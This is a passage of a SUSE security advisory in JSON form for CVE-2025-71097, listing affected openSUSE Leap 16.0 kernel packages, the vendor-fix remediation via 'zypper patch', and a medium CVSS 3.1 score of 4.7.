"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71097",
"url": "https://www.suse.com/security/cve/CVE-2025-71097"
},
{
"category": "external",
"summary": "SUSE Bug 1256607 for CVE-2025-71097",
"url": "https://bugzilla.suse.com/1256607"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
